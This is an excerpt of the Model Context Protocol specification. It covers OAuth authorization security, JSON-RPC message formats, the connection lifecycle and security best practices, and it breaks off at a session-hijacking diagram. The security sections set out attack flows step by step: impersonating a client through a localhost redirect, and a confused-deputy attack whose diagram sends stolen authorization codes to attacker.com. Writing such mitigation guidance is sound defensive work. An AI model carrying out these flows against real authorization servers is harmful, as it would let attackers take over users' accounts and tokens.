(Further described in [OAuth 2.1 Section 7.5](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-7.5))
To mitigate this, MCP clients **MUST** implement PKCE according to [OAuth 2.1 Section 7.5.2](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-7.5.2) and **MUST** verify PKCE support before proceeding with authorization.
PKCE helps prevent authorization code interception and injection attacks by requiring clients to create a secret verifier-challenge pair, ensuring that only the original requestor can exchange an authorization code for tokens.
MCP clients **MUST** use the `S256` code challenge method when technically capable, as required by [OAuth 2.1 Section 4.1.1](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-4.1.1).
Since OAuth 2.1 and PKCE specifications do not define a mechanism for clients to discover PKCE support, MCP clients **MUST** rely on authorization server metadata to verify this capability:
* **OAuth 2.0 Authorization Server Metadata**: If `code_challenge_methods_supported` is absent, the authorization server does not support PKCE and MCP clients **MUST** refuse to proceed.
* **OpenID Connect Discovery 1.0**: While the [OpenID Provider Metadata](https://openid.net/specs/openid-connect-discovery-1_0.html#ProviderMetadata) does not define `code_challenge_methods_supported`, this field is commonly included by OpenID providers. MCP clients **MUST** verify the presence of `code_challenge_methods_supported` in the provider metadata response. If the field is absent, MCP clients **MUST** refuse to proceed.
Authorization servers providing OpenID Connect Discovery 1.0 **MUST** include `code_challenge_methods_supported` in their metadata to ensure MCP compatibility.
### Open Redirection
An attacker may craft malicious redirect URIs to direct users to phishing sites.
MCP clients **MUST** have redirect URIs registered with the authorization server.
Authorization servers **MUST** validate exact redirect URIs against pre-registered values to prevent redirection attacks.
MCP clients **SHOULD** use and verify state parameters in the authorization code flow
and discard any results that do not include or have a mismatch with the original state.
Authorization servers **MUST** take precautions to prevent redirecting user agents to untrusted URI's, following suggestions laid out in [OAuth 2.1 Section 7.12.2](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-7.12.2)
Authorization servers **SHOULD** only automatically redirect the user agent if it trusts the redirection URI. If the URI is not trusted, the authorization server MAY inform the user and rely on the user to make the correct decision.
### Client ID Metadata Document Security
When implementing Client ID Metadata Documents, authorization servers **MUST** consider the security implications
detailed in [OAuth Client ID Metadata Document, Section 6](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-client-id-metadata-document-00#name-security-considerations).
Key considerations include:
#### Authorization Server Abuse Protection
The authorization server takes a URL as input from an unknown client and fetches that URL.
A malicious client could use this to trigger the authorization server to make requests to arbitrary URLs,
such as requests to private administration endpoints the authorization server has access to.
Authorization servers fetching metadata documents **SHOULD** consider
[Server-Side Request Forgery (SSRF)](https://developer.mozilla.org/docs/Web/Security/Attacks/SSRF) risks, as described in [OAuth Client ID Metadata Document: Server Side Request Forgery (SSRF) Attacks](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-client-id-metadata-document-00#name-server-side-request-forgery).
#### Localhost Redirect URI Risks
Client ID Metadata Documents cannot prevent `localhost` URL impersonation by themselves. An attacker can claim to be any client by:
1. Providing the legitimate client's metadata URL as their `client_id`
2. Binding to the any `localhost` port, and providing that address as the redirect\_uri
3. Receiving the authorization code via the redirect when the user approves
The server will see the legitimate client's metadata document and the user will see the legitimate client's name, making attack detection difficult.
Authorization servers:
* **SHOULD** display additional warnings for `localhost`-only redirect URIs
* **MAY** require additional attestation mechanisms for enhanced security
* **MUST** clearly display the redirect URI hostname during authorization
#### Trust Policies
Authorization servers **MAY** implement domain-based trust policies:
* Allowlists for trusted domains (for protected servers)
* Accept any HTTPS `client_id` (for open servers)
* Reputation checks for unknown domains
* Restrictions based on domain age or certificate validation
* Display the CIMD and other associated client hostnames prominently to prevent phishing
Servers maintain full control over their access policies.
### Confused Deputy Problem
Attackers can exploit MCP servers acting as intermediaries to third-party APIs, leading to [confused deputy vulnerabilities](/specification/2025-11-25/basic/security_best_practices#confused-deputy-problem).
By using stolen authorization codes, they can obtain access tokens without user consent.
MCP proxy servers using static client IDs **MUST** obtain user consent for each dynamically
registered client before forwarding to third-party authorization servers (which may require additional consent).
### Access Token Privilege Restriction
An attacker can gain unauthorized access or otherwise compromise an MCP server if the server accepts tokens issued for other resources.
This vulnerability has two critical dimensions:
1. **Audience validation failures.** When an MCP server doesn't verify that tokens were specifically intended for it (for example, via the audience claim, as mentioned in [RFC9068](https://www.rfc-editor.org/rfc/rfc9068.html)), it may accept tokens originally issued for other services. This breaks a fundamental OAuth security boundary, allowing attackers to reuse legitimate tokens across different services than intended.
2. **Token passthrough.** If the MCP server not only accepts tokens with incorrect audiences but also forwards these unmodified tokens to downstream services, it can potentially cause the ["confused deputy" problem](#confused-deputy-problem), where the downstream API may incorrectly trust the token as if it came from the MCP server or assume the token was validated by the upstream API. See the [Token Passthrough section](/specification/2025-11-25/basic/security_best_practices#token-passthrough) of the Security Best Practices guide for additional details.
MCP servers **MUST** validate access tokens before processing the request, ensuring the access token is issued specifically for the MCP server, and take all necessary steps to ensure no data is returned to unauthorized parties.
A MCP server **MUST** follow the guidelines in [OAuth 2.1 - Section 5.2](https://www.ietf.org/archive/id/draft-ietf-oauth-v2-1-13.html#section-5.2) to validate inbound tokens.
MCP servers **MUST** only accept tokens specifically intended for themselves and **MUST** reject tokens that do not include them in the audience claim or otherwise verify that they are the intended recipient of the token. See the [Security Best Practices Token Passthrough section](/specification/2025-11-25/basic/security_best_practices#token-passthrough) for details.
If the MCP server makes requests to upstream APIs, it may act as an OAuth client to them. The access token used at the upstream API is a separate token, issued by the upstream authorization server. The MCP server **MUST NOT** pass through the token it received from the MCP client.
MCP clients **MUST** implement and use the `resource` parameter as defined in [RFC 8707 - Resource Indicators for OAuth 2.0](https://www.rfc-editor.org/rfc/rfc8707.html)
to explicitly specify the target resource for which the token is being requested. This requirement aligns with the recommendation in
[RFC 9728 Section 7.4](https://datatracker.ietf.org/doc/html/rfc9728#section-7.4). This ensures that access tokens are bound to their intended resources and
cannot be misused across different services.
## MCP Authorization Extensions
There are several authorization extensions to the core protocol that define additional authorization mechanisms. These extensions are:
* **Optional** - Implementations can choose to adopt these extensions
* **Additive** - Extensions do not modify or break core protocol functionality; they add new capabilities while preserving core protocol behavior
* **Composable** - Extensions are modular and designed to work together without conflicts, allowing implementations to adopt multiple extensions simultaneously
* **Versioned independently** - Extensions follow the core MCP versioning cycle but may adopt independent versioning as needed
A list of supported extensions can be found in the [MCP Authorization Extensions](https://github.com/modelcontextprotocol/ext-auth) repository.
# Overview
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/index
**Protocol Revision**: 2025-11-25
The Model Context Protocol consists of several key components that work together:
* **Base Protocol**: Core JSON-RPC message types
* **Lifecycle Management**: Connection initialization, capability negotiation, and
session control
* **Authorization**: Authentication and authorization framework for HTTP-based transports
* **Server Features**: Resources, prompts, and tools exposed by servers
* **Client Features**: Sampling and root directory lists provided by clients
* **Utilities**: Cross-cutting concerns like logging and argument completion
All implementations **MUST** support the base protocol and lifecycle management
components. Other components **MAY** be implemented based on the specific needs of the
application.
These protocol layers establish clear separation of concerns while enabling rich
interactions between clients and servers. The modular design allows implementations to
support exactly the features they need.
## Messages
All messages between MCP clients and servers **MUST** follow the
[JSON-RPC 2.0](https://www.jsonrpc.org/specification) specification. The protocol defines
these types of messages:
### Requests
[Requests](/specification/2025-11-25/schema#jsonrpcrequest) are sent from the client to the server or vice versa, to initiate an operation.
```typescript theme={null}
{
jsonrpc: "2.0";
id: string | number;
method: string;
params?: {
[key: string]: unknown;
};
}
```
* Requests **MUST** include a string or integer ID.
* Unlike base JSON-RPC, the ID **MUST NOT** be `null`.
* The request ID **MUST NOT** have been previously used by the requestor within the same
session.
### Responses
Responses are sent in reply to requests, containing either the result or error of the operation.
#### Result Responses
[Result responses](/specification/2025-11-25/schema#jsonrpcresultresponse) are sent when the operation completes successfully.
```typescript theme={null}
{
jsonrpc: "2.0";
id: string | number;
result: {
[key: string]: unknown;
}
}
```
* Result responses **MUST** include the same ID as the request they correspond to.
* Result responses **MUST** include a `result` field.
* The `result` **MAY** follow any JSON object structure.
#### Error Responses
[Error responses](/specification/2025-11-25/schema#jsonrpcerrorresponse) are sent when the operation fails or encounters an error.
```typescript theme={null}
{
jsonrpc: "2.0";
id?: string | number;
error: {
code: number;
message: string;
data?: unknown;
}
}
```
* Error responses **MUST** include the same ID as the request they correspond to (except in error cases where the ID could not be read due a malformed request).
* Error responses **MUST** include an `error` field with a `code` and `message`.
* Error codes **MUST** be integers.
### Notifications
[Notifications](/specification/2025-11-25/schema#jsonrpcnotification) are sent from the client to the server or vice versa, as a one-way message.
The receiver **MUST NOT** send a response.
```typescript theme={null}
{
jsonrpc: "2.0";
method: string;
params?: {
[key: string]: unknown;
};
}
```
* Notifications **MUST NOT** include an ID.
## Auth
MCP provides an [Authorization](/specification/2025-11-25/basic/authorization) framework for use with HTTP.
Implementations using an HTTP-based transport **SHOULD** conform to this specification,
whereas implementations using STDIO transport **SHOULD NOT** follow this specification,
and instead retrieve credentials from the environment.
Additionally, clients and servers **MAY** negotiate their own custom authentication and
authorization strategies.
For further discussions and contributions to the evolution of MCP's auth mechanisms, join
us in
[GitHub Discussions](https://github.com/modelcontextprotocol/specification/discussions)
to help shape the future of the protocol!
## Schema
The full specification of the protocol is defined as a
[TypeScript schema](https://github.com/modelcontextprotocol/specification/blob/main/schema/2025-11-25/schema.ts).
This is the source of truth for all protocol messages and structures.
There is also a
[JSON Schema](https://github.com/modelcontextprotocol/specification/blob/main/schema/2025-11-25/schema.json),
which is automatically generated from the TypeScript source of truth, for use with
various automated tooling.
## JSON Schema Usage
The Model Context Protocol uses JSON Schema for validation throughout the protocol. This section clarifies how JSON Schema should be used within MCP messages.
### Schema Dialect
MCP supports JSON Schema with the following rules:
1. **Default dialect**: When a schema does not include a `$schema` field, it defaults to [JSON Schema 2020-12](https://json-schema.org/draft/2020-12/schema)
2. **Explicit dialect**: Schemas MAY include a `$schema` field to specify a different dialect
3. **Supported dialects**: Implementations MUST support at least 2020-12 and SHOULD document which additional dialects they support
4. **Recommendation**: Implementors are RECOMMENDED to use JSON Schema 2020-12.
### Example Usage
#### Default dialect (2020-12):
```json theme={null}
{
"type": "object",
"properties": {
"name": { "type": "string" },
"age": { "type": "integer", "minimum": 0 }
},
"required": ["name"]
}
```
#### Explicit dialect (draft-07):
```json theme={null}
{
"$schema": "http://json-schema.org/draft-07/schema#",
"type": "object",
"properties": {
"name": { "type": "string" },
"age": { "type": "integer", "minimum": 0 }
},
"required": ["name"]
}
```
### Implementation Requirements
* Clients and servers **MUST** support JSON Schema 2020-12 for schemas without an explicit `$schema` field
* Clients and servers **MUST** validate schemas according to their declared or default dialect. They **MUST** handle unsupported dialects gracefully by returning an appropriate error indicating the dialect is not supported.
* Clients and servers **SHOULD** document which schema dialects they support
### Schema Validation
* Schemas **MUST** be valid according to their declared or default dialect
## General fields
### `_meta`
The `_meta` property/parameter is reserved by MCP to allow clients and servers
to attach additional metadata to their interactions.
Certain key names are reserved by MCP for protocol-level metadata, as specified below;
implementations MUST NOT make assumptions about values at these keys.
Additionally, definitions in the [schema](https://github.com/modelcontextprotocol/specification/blob/main/schema/2025-11-25/schema.ts)
may reserve particular names for purpose-specific metadata, as declared in those definitions.
**Key name format:** valid `_meta` key names have two segments: an optional **prefix**, and a **name**.
**Prefix:**
* If specified, MUST be a series of labels separated by dots (`.`), followed by a slash (`/`).
* Labels MUST start with a letter and end with a letter or digit; interior characters can be letters, digits, or hyphens (`-`).
* Implementations SHOULD use reverse DNS notation (e.g., `com.example/` rather than `example.com/`).
* Any prefix where the second label is `modelcontextprotocol` or `mcp` is **reserved** for MCP use.
* For example: `io.modelcontextprotocol/`, `dev.mcp/`, `org.modelcontextprotocol.api/`, and `com.mcp.tools/` are all reserved.
* However, `com.example.mcp/` is NOT reserved, as the second label is `example`.
**Name:**
* Unless empty, MUST begin and end with an alphanumeric character (`[a-z0-9A-Z]`).
* MAY contain hyphens (`-`), underscores (`_`), dots (`.`), and alphanumerics in between.
### `icons`
The `icons` property provides a standardized way for servers to expose visual identifiers for their resources, tools, prompts, and implementations. Icons enhance user interfaces by providing visual context and improving the discoverability of available functionality.
Icons are represented as an array of `Icon` objects, where each icon includes:
* `src`: A URI pointing to the icon resource (required). This can be:
* An HTTP/HTTPS URL pointing to an image file
* A data URI with base64-encoded image data
* `mimeType`: Optional MIME type if the server's type is missing or generic
* `sizes`: Optional array of size specifications (e.g., `["48x48"]`, `["any"]` for scalable formats like SVG, or `["48x48", "96x96"]` for multiple sizes)
* `theme`: Optional theme preference (`light` or `dark`) for the icon background
**Required MIME type support:**
Clients that support rendering icons **MUST** support at least the following MIME types:
* `image/png` - PNG images (safe, universal compatibility)
* `image/jpeg` (and `image/jpg`) - JPEG images (safe, universal compatibility)
Clients that support rendering icons **SHOULD** also support:
* `image/svg+xml` - SVG images (scalable but requires security precautions as noted below)
* `image/webp` - WebP images (modern, efficient format)
**Security considerations:**
Consumers of icon metadata **MUST** take appropriate security precautions when handling icons to prevent compromise:
* Treat icon metadata and icon bytes as untrusted inputs and defend against network, privacy, and parsing risks.
* Ensure that the icon URI is either a HTTPS or `data:` URI. Clients **MUST** reject icon URIs that use unsafe schemes and redirects, such as `javascript:`, `file:`, `ftp:`, `ws:`, or local app URI schemes.
* Disallow scheme changes and redirects to hosts on different origins.
* Be resilient against resource exhaustion attacks stemming from oversized images, large dimensions, or excessive frames (e.g., in GIFs).
* Consumers **MAY** set limits for image and content size.
* Fetch icons without credentials. Do not send cookies, `Authorization` headers, or client credentials.
* Verify that icon URIs are from the same origin as the server. This minimizes the risk of exposing data or tracking information to third-parties.
* Exercise caution when fetching and rendering icons as the payload **MAY** contain executable content (e.g., SVG with [embedded JavaScript](https://www.w3.org/TR/SVG11/script.html) or [extended capabilities](https://www.w3.org/TR/SVG11/extend.html)).
* Consumers **MAY** choose to disallow specific file types or otherwise sanitize icon files before rendering.
* Validate MIME types and file contents before rendering. Treat the MIME type information as advisory. Detect content type via magic bytes; reject on mismatch or unknown types.
* Maintain a strict allowlist of image types.
**Usage:**
Icons can be attached to:
* `Implementation`: Visual identifier for the MCP server/client implementation
* `Tool`: Visual representation of the tool's functionality
* `Prompt`: Icon to display alongside prompt templates
* `Resource`: Visual indicator for different resource types
Multiple icons can be provided to support different display contexts and resolutions. Clients should select the most appropriate icon based on their UI requirements.
# Lifecycle
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/lifecycle
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) defines a rigorous lifecycle for client-server
connections that ensures proper capability negotiation and state management.
1. **Initialization**: Capability negotiation and protocol version agreement
2. **Operation**: Normal protocol communication
3. **Shutdown**: Graceful termination of the connection
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
Note over Client,Server: Initialization Phase
activate Client
Client->>+Server: initialize request
Server-->>Client: initialize response
Client--)Server: initialized notification
Note over Client,Server: Operation Phase
rect rgb(200, 220, 250)
note over Client,Server: Normal protocol operations
end
Note over Client,Server: Shutdown
Client--)-Server: Disconnect
deactivate Server
Note over Client,Server: Connection closed
```
## Lifecycle Phases
### Initialization
The initialization phase **MUST** be the first interaction between client and server.
During this phase, the client and server:
* Establish protocol version compatibility
* Exchange and negotiate capabilities
* Share implementation details
The client **MUST** initiate this phase by sending an `initialize` request containing:
* Protocol version supported
* Client capabilities
* Client implementation information
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "initialize",
"params": {
"protocolVersion": "2025-11-25",
"capabilities": {
"roots": {
"listChanged": true
},
"sampling": {},
"elicitation": {
"form": {},
"url": {}
},
"tasks": {
"requests": {
"elicitation": {
"create": {}
},
"sampling": {
"createMessage": {}
}
}
}
},
"clientInfo": {
"name": "ExampleClient",
"title": "Example Client Display Name",
"version": "1.0.0",
"description": "An example MCP client application",
"icons": [
{
"src": "https://example.com/icon.png",
"mimeType": "image/png",
"sizes": ["48x48"]
}
],
"websiteUrl": "https://example.com"
}
}
}
```
The server **MUST** respond with its own capabilities and information:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"protocolVersion": "2025-11-25",
"capabilities": {
"logging": {},
"prompts": {
"listChanged": true
},
"resources": {
"subscribe": true,
"listChanged": true
},
"tools": {
"listChanged": true
},
"tasks": {
"list": {},
"cancel": {},
"requests": {
"tools": {
"call": {}
}
}
}
},
"serverInfo": {
"name": "ExampleServer",
"title": "Example Server Display Name",
"version": "1.0.0",
"description": "An example MCP server providing tools and resources",
"icons": [
{
"src": "https://example.com/server-icon.svg",
"mimeType": "image/svg+xml",
"sizes": ["any"]
}
],
"websiteUrl": "https://example.com/server"
},
"instructions": "Optional instructions for the client"
}
}
```
After successful initialization, the client **MUST** send an `initialized` notification
to indicate it is ready to begin normal operations:
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/initialized"
}
```
* The client **SHOULD NOT** send requests other than
[pings](/specification/2025-11-25/basic/utilities/ping) before the server has responded to the
`initialize` request.
* The server **SHOULD NOT** send requests other than
[pings](/specification/2025-11-25/basic/utilities/ping) and
[logging](/specification/2025-11-25/server/utilities/logging) before receiving the `initialized`
notification.
#### Version Negotiation
In the `initialize` request, the client **MUST** send a protocol version it supports.
This **SHOULD** be the *latest* version supported by the client.
If the server supports the requested protocol version, it **MUST** respond with the same
version. Otherwise, the server **MUST** respond with another protocol version it
supports. This **SHOULD** be the *latest* version supported by the server.
If the client does not support the version in the server's response, it **SHOULD**
disconnect.
If using HTTP, the client **MUST** include the `MCP-Protocol-Version: ` HTTP header on all subsequent requests to the MCP
server.
For details, see [the Protocol Version Header section in Transports](/specification/2025-11-25/basic/transports#protocol-version-header).
#### Capability Negotiation
Client and server capabilities establish which optional protocol features will be
available during the session.
Key capabilities include:
| Category | Capability | Description |
| -------- | -------------- | --------------------------------------------------------------------------------------------- |
| Client | `roots` | Ability to provide filesystem [roots](/specification/2025-11-25/client/roots) |
| Client | `sampling` | Support for LLM [sampling](/specification/2025-11-25/client/sampling) requests |
| Client | `elicitation` | Support for server [elicitation](/specification/2025-11-25/client/elicitation) requests |
| Client | `tasks` | Support for [task-augmented](/specification/2025-11-25/basic/utilities/tasks) client requests |
| Client | `experimental` | Describes support for non-standard experimental features |
| Server | `prompts` | Offers [prompt templates](/specification/2025-11-25/server/prompts) |
| Server | `resources` | Provides readable [resources](/specification/2025-11-25/server/resources) |
| Server | `tools` | Exposes callable [tools](/specification/2025-11-25/server/tools) |
| Server | `logging` | Emits structured [log messages](/specification/2025-11-25/server/utilities/logging) |
| Server | `completions` | Supports argument [autocompletion](/specification/2025-11-25/server/utilities/completion) |
| Server | `tasks` | Support for [task-augmented](/specification/2025-11-25/basic/utilities/tasks) server requests |
| Server | `experimental` | Describes support for non-standard experimental features |
Capability objects can describe sub-capabilities like:
* `listChanged`: Support for list change notifications (for prompts, resources, and
tools)
* `subscribe`: Support for subscribing to individual items' changes (resources only)
### Operation
During the operation phase, the client and server exchange messages according to the
negotiated capabilities.
Both parties **MUST**:
* Respect the negotiated protocol version
* Only use capabilities that were successfully negotiated
### Shutdown
During the shutdown phase, one side (usually the client) cleanly terminates the protocol
connection. No specific shutdown messages are defined—instead, the underlying transport
mechanism should be used to signal connection termination:
#### stdio
For the stdio [transport](/specification/2025-11-25/basic/transports), the client **SHOULD** initiate
shutdown by:
1. First, closing the input stream to the child process (the server)
2. Waiting for the server to exit, or sending `SIGTERM` if the server does not exit
within a reasonable time
3. Sending `SIGKILL` if the server does not exit within a reasonable time after `SIGTERM`
The server **MAY** initiate shutdown by closing its output stream to the client and
exiting.
#### HTTP
For HTTP [transports](/specification/2025-11-25/basic/transports), shutdown is indicated by closing the
associated HTTP connection(s).
## Timeouts
Implementations **SHOULD** establish timeouts for all sent requests, to prevent hung
connections and resource exhaustion. When the request has not received a success or error
response within the timeout period, the sender **SHOULD** issue a [cancellation
notification](/specification/2025-11-25/basic/utilities/cancellation) for that request and stop waiting for
a response.
SDKs and other middleware **SHOULD** allow these timeouts to be configured on a
per-request basis.
Implementations **MAY** choose to reset the timeout clock when receiving a [progress
notification](/specification/2025-11-25/basic/utilities/progress) corresponding to the request, as this
implies that work is actually happening. However, implementations **SHOULD** always
enforce a maximum timeout, regardless of progress notifications, to limit the impact of a
misbehaving client or server.
## Error Handling
Implementations **SHOULD** be prepared to handle these error cases:
* Protocol version mismatch
* Failure to negotiate required capabilities
* Request [timeouts](#timeouts)
Example initialization error:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"error": {
"code": -32602,
"message": "Unsupported protocol version",
"data": {
"supported": ["2024-11-05"],
"requested": "1.0.0"
}
}
}
```
# Security Best Practices
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/security_best_practices
## Introduction
### Purpose and Scope
This document provides security considerations for the Model Context Protocol (MCP), complementing the [MCP Authorization](../basic/authorization) specification. This document identifies security risks, attack vectors, and best practices specific to MCP implementations.
The primary audience for this document includes developers implementing MCP authorization flows, MCP server operators, and security professionals evaluating MCP-based systems. This document should be read alongside the MCP Authorization specification and [OAuth 2.0 security best practices](https://datatracker.ietf.org/doc/html/rfc9700).
## Attacks and Mitigations
This section gives a detailed description of attacks on MCP implementations, along with potential countermeasures.
### Confused Deputy Problem
Attackers can exploit MCP proxy servers that connect to third-party APIs, creating "[confused deputy](https://en.wikipedia.org/wiki/Confused_deputy_problem)" vulnerabilities. This attack allows malicious clients to obtain authorization codes without proper user consent by exploiting the combination of static client IDs, dynamic client registration, and consent cookies.
#### Terminology
**MCP Proxy Server**
: An MCP server that connects MCP clients to third-party APIs, offering MCP features while delegating operations and acting as a single OAuth client to the third-party API server.
**Third-Party Authorization Server**
: Authorization server that protects the third-party API. It may lack dynamic client registration support, requiring the MCP proxy to use a static client ID for all requests.
**Third-Party API**
: The protected resource server that provides the actual API functionality. Access to this
API requires tokens issued by the third-party authorization server.
**Static Client ID**
: A fixed OAuth 2.0 client identifier used by the MCP proxy server when communicating with
the third-party authorization server. This Client ID refers to the MCP server acting as a client
to the Third-Party API. It is the same value for all MCP server to Third-Party API interactions regardless of
which MCP client initiated the request.
#### Vulnerable Conditions
This attack becomes possible when all of the following conditions are present:
* MCP proxy server uses a **static client ID** with a third-party authorization server
* MCP proxy server allows MCP clients to **dynamically register** (each getting their own client\_id)
* The third-party authorization server sets a **consent cookie** after the first authorization
* MCP proxy server does not implement proper per-client consent before forwarding to third-party authorization
#### Architecture and Attack Flows
##### Normal OAuth proxy usage (preserves user consent)
```mermaid theme={null}
sequenceDiagram
participant UA as User-Agent (Browser)
participant MC as MCP Client
participant M as MCP Proxy Server
participant TAS as Third-Party Authorization Server
Note over UA,M: Initial Auth flow completed
Note over UA,TAS: Step 1: Legitimate user consent for Third Party Server
M->>UA: Redirect to third party authorization server
UA->>TAS: Authorization request (client_id: mcp-proxy)
TAS->>UA: Authorization consent screen
Note over UA: Review consent screen
UA->>TAS: Approve
TAS->>UA: Set consent cookie for client ID: mcp-proxy
TAS->>UA: 3P Authorization code + redirect to mcp-proxy-server.com
UA->>M: 3P Authorization code
Note over M,TAS: Exchange 3P code for 3P token
Note over M: Generate MCP authorization code
M->>UA: Redirect to MCP Client with MCP authorization code
Note over M,UA: Exchange code for token, etc.
```
##### Malicious OAuth proxy usage (skips user consent)
```mermaid theme={null}
sequenceDiagram
participant UA as User-Agent (Browser)
participant M as MCP Proxy Server
participant TAS as Third-Party Authorization Server
participant A as Attacker
Note over UA,A: Step 2: Attack (leveraging existing cookie, skipping consent)
A->>M: Dynamically register malicious client, redirect_uri: attacker.com
A->>UA: Sends malicious link
UA->>TAS: Authorization request (client_id: mcp-proxy) + consent cookie
rect rgba(255, 17, 0, 0.67)
TAS->>TAS: Cookie present, consent skipped
end
TAS->>UA: 3P Authorization code + redirect to mcp-proxy-server.com
UA->>M: 3P Authorization code
Note over M,TAS: Exchange 3P code for 3P token
Note over M: Generate MCP authorization code
M->>UA: Redirect to attacker.com with MCP Authorization code
UA->>A: MCP Authorization code delivered to attacker.com
Note over M,A: Attacker exchanges MCP code for MCP token
A->>M: Attacker impersonates user to MCP server
```
#### Attack Description
When an MCP proxy server uses a static client ID to authenticate with a third-party
authorization server, the following attack becomes possible:
1. A user authenticates normally through the MCP proxy server to access the third-party API
2. During this flow, the third-party authorization server sets a cookie on the user agent
indicating consent for the static client ID
3. An attacker later sends the user a malicious link containing a crafted authorization request which contains a malicious redirect URI along with a new dynamically registered client ID
4. When the user clicks the link, their browser still has the consent cookie from the previous legitimate request
5. The third-party authorization server detects the cookie and skips the consent screen
6. The MCP authorization code is redirected to the attacker's server (specified in the malicious `redirect_uri` parameter during [dynamic client registration](/specification/2025-11-25/basic/authorization#dynamic-client-registration))
7. The attacker exchanges the stolen authorization code for access tokens for the MCP server without the user's explicit approval
8. The attacker now has access to the third-party API as the compromised user
#### Mitigation
To prevent confused deputy attacks, MCP proxy servers **MUST** implement per-client consent and proper security controls as detailed below.
##### Consent Flow Implementation
The following diagram shows how to properly implement per-client consent that runs **before** the third-party authorization flow:
```mermaid theme={null}
sequenceDiagram
participant Client as MCP Client
participant Browser as User's Browser
participant MCP as MCP Server
participant ThirdParty as Third-Party AuthZ Server
Note over Client,ThirdParty: 1. Client Registration (Dynamic)
Client->>MCP: Register with redirect_uri
MCP-->>Client: client_id
Note over Client,ThirdParty: 2. Authorization Request
Client->>Browser: Open MCP server authorization URL
Browser->>MCP: GET /authorize?client_id=...&redirect_uri=...
alt Check MCP Server Consent
MCP->>MCP: Check consent for this client_id
Note over MCP: Not previously approved
end
MCP->>Browser: Show MCP server-owned consent page
Note over Browser: "Allow [Client Name] to access [Third-Party API]?"
Browser->>MCP: POST /consent (approve)
MCP->>MCP: Store consent decision for client_id
Note over Client,ThirdParty: 3. Forward to Third-Party
MCP->>Browser: Redirect to third-party /authorize
Note over MCP: Use static client_id for third-party
Browser->>ThirdParty: Authorization request (static client_id)
ThirdParty->>Browser: User authenticates & consents
ThirdParty->>Browser: Redirect with auth code
Browser->>MCP: Callback with third-party code
MCP->>ThirdParty: Exchange code for token (using static client_id)
MCP->>Browser: Redirect to client's registered redirect_uri
```
##### Required Protections
**Per-Client Consent Storage**
MCP proxy servers **MUST**:
* Maintain a registry of approved `client_id` values per user
* Check this registry **before** initiating the third-party authorization flow
* Store consent decisions securely (server-side database, or server specific cookies)
**Consent UI Requirements**
The MCP-level consent page **MUST**:
* Clearly identify the requesting MCP client by name
* Display the specific third-party API scopes being requested
* Show the registered `redirect_uri` where tokens will be sent
* Implement CSRF protection (e.g., state parameter, CSRF tokens)
* Prevent iframing via `frame-ancestors` CSP directive or `X-Frame-Options: DENY` to prevent clickjacking
**Consent Cookie Security**
If using cookies to track consent decisions, they **MUST**:
* Use `__Host-` prefix for cookie names
* Set `Secure`, `HttpOnly`, and `SameSite=Lax` attributes
* Be cryptographically signed or use server-side sessions
* Bind to the specific `client_id` (not just "user has consented")
**Redirect URI Validation**
The MCP proxy server **MUST**:
* Validate that the `redirect_uri` in authorization requests exactly matches the registered URI
* Reject requests if the `redirect_uri` has changed without re-registration
* Use exact string matching (not pattern matching or wildcards)
**OAuth State Parameter Validation**
The OAuth `state` parameter is critical to prevent authorization code interception and CSRF attacks. Proper state validation ensures that consent approval at the authorization endpoint is enforced at the callback endpoint.
MCP proxy servers implementing OAuth flows **MUST**:
* Generate a cryptographically secure random `state` value for each authorization request
* Store the `state` value server-side (in a secure session store or encrypted cookie) **only after** consent has been explicitly approved
* Set the `state` tracking cookie/session **immediately before** redirecting to the third-party identity provider (not before consent approval)
* Validate at the callback endpoint that the `state` query parameter exactly matches the stored value in the callback request's cookies or in the request's cookie-based session
* Reject any callback requests where the `state` parameter is missing or does not match
* Ensure `state` values are single-use (delete after validation) and have a short expiration time (e.g., 10 minutes)
The consent cookie or session containing the `state` value **MUST NOT** be set until **after** the user has approved the consent screen at the MCP server's authorization endpoint. Setting this cookie before consent approval renders the consent screen ineffective, as an attacker could bypass it by crafting a malicious authorization request.
### Token Passthrough
"Token passthrough" is an anti-pattern where an MCP server accepts tokens from an MCP client without validating that the tokens were properly issued *to the MCP server* and passes them through to the downstream API.
#### Risks
Token passthrough is explicitly forbidden in the [authorization specification](/specification/2025-11-25/basic/authorization) as it introduces a number of security risks, that include:
* **Security Control Circumvention**
* The MCP Server or downstream APIs might implement important security controls like rate limiting, request validation, or traffic monitoring, that depend on the token audience or other credential constraints. If clients can obtain and use tokens directly with the downstream APIs without the MCP server validating them properly or ensuring that the tokens are issued for the right service, they bypass these controls.
* **Accountability and Audit Trail Issues**
* The MCP Server will be unable to identify or distinguish between MCP Clients when clients are calling with an upstream-issued access token which may be opaque to the MCP Server.
* The downstream Resource Server’s logs may show requests that appear to come from a different source with a different identity, rather than the MCP server that is actually forwarding the tokens.
* Both factors make incident investigation, controls, and auditing more difficult.
* If the MCP Server passes tokens without validating their claims (e.g., roles, privileges, or audience) or other metadata, a malicious actor in possession of a stolen token can use the server as a proxy for data exfiltration.
* **Trust Boundary Issues**
* The downstream Resource Server grants trust to specific entities. This trust might include assumptions about origin or client behavior patterns. Breaking this trust boundary could lead to unexpected issues.
* If the token is accepted by multiple services without proper validation, an attacker compromising one service can use the token to access other connected services.
* **Future Compatibility Risk**
* Even if an MCP Server starts as a "pure proxy" today, it might need to add security controls later. Starting with proper token audience separation makes it easier to evolve the security model.
#### Mitigation
MCP servers **MUST NOT** accept any tokens that were not explicitly issued for the MCP server.
### Session Hijacking
Session hijacking is an attack vector where a client is provided a session ID by the server, and an unauthorized party is able to obtain and use that same session ID to impersonate the original client and perform unauthorized actions on their behalf.
#### Session Hijack Prompt Injection
```mermaid theme={null}
sequenceDiagram
participant Client
participant ServerA
participant Queue
participant ServerB
participant Attacker
Client->>ServerA: Initialize (connect to streamable HTTP server)
